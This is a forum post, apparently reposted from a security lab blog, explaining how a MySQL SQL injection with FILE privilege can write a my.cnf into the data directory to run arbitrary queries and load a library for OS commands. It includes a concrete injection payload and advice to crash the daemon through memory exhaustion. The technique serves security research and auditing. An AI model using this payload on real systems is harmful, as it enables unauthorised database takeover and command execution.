Prev Предыдущее сообщение   Следующее сообщение Next
Старый 04.03.2012, 22:10   #1
d0znpp
 
Аватар для d0znpp
 
Регистрация: 09.09.2010
Сообщений: 484
Репутация: 252
По умолчанию Выполнение подзапросов и команд ОС в инъекциях SELECT под MySQL

We would like to open our blog notes on the practical implementation of the SQL-injections.
And also we try to focus more attention on the practical aspects of web application security in the future.

SQL injections are the most common server-side Web application vulnerabilities and meet almost every audit in our practice.
Very often it happens that through these vulnerabilities we can write files (granted FILE_PRIV).
The simplest way of the exploitation in this case - write executable script (i.e. shell.php) in www-root (i.e. /var/www/).
But sometimes there is no filesystem rights to write in /var/www.

We would like to present a method for the operation of these vulnerabilities to execute arbitrary queries and even commands (tested in Debian lenny).
This is not the easiest attack vector, but it is possible!

The idea is very simple and is to replace the file my.cnf. This configuration file is write-protected directory:
-rw-r--r-- 1 root root 3596 /etc/mysql/my.cnf
#debian lenny
However, if you write my.cnf in DATADIR it will work! And DATADIR is writable always:
drwx------ 4 mysql mysql 4096 /var/lib/mysql
#debian lenny

Then look at documentation:
http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_connect
http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_init_file
http://dev.mysql.com/doc/refman/5.1/en/replication-options-slave.html#sysvar_init_slave

Finally, attack vector will be like that:
'AND 1=2 UNION SELECT '[mysqld]\ninit_file="update users set passwd=123 where id=0"\n#'
INTO OUTFILE '/var/lib/mysql/my.cnf'-- -

Now you can execute any query from SQL-injection into SELECT statement and FILE_PRIV.
Query in init-connect will be executed after the non-SUPER user logs in.
And there is another problem - you must somehow restart MySQL daemon.
The easiest way to wait until it happens naturally.
But you can always send a hard query to exceed a memory limit.
Then OOM Killer make your job

On MySQL 5.1.2+ (required by http://dev.mysql.com/doc/refman/5.1/en/server-system-variables.html#sysvar_plugin_dir) you can also execute OS commands by my.cnf like that:
[mysqld]
plugin_dir = /var/tmp/aaa # 5.1.2+ only
init-connect = "CREATE FUNCTION do_system RETURNS INTEGER SONAME 'so_system.so.0.0';"
# 2 3 4 5 6 7 8 9 10 11
Where /var/tmp/aaa is any writable directory, so_system.so.0.0 is your binary library.

Origin: http://lab.onsec.ru/2012/03/advanced-sqli-exploitation-with.html
__________________
The Sucks Origin Policy
d0znpp вне форума   Ответить с цитированием
 

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot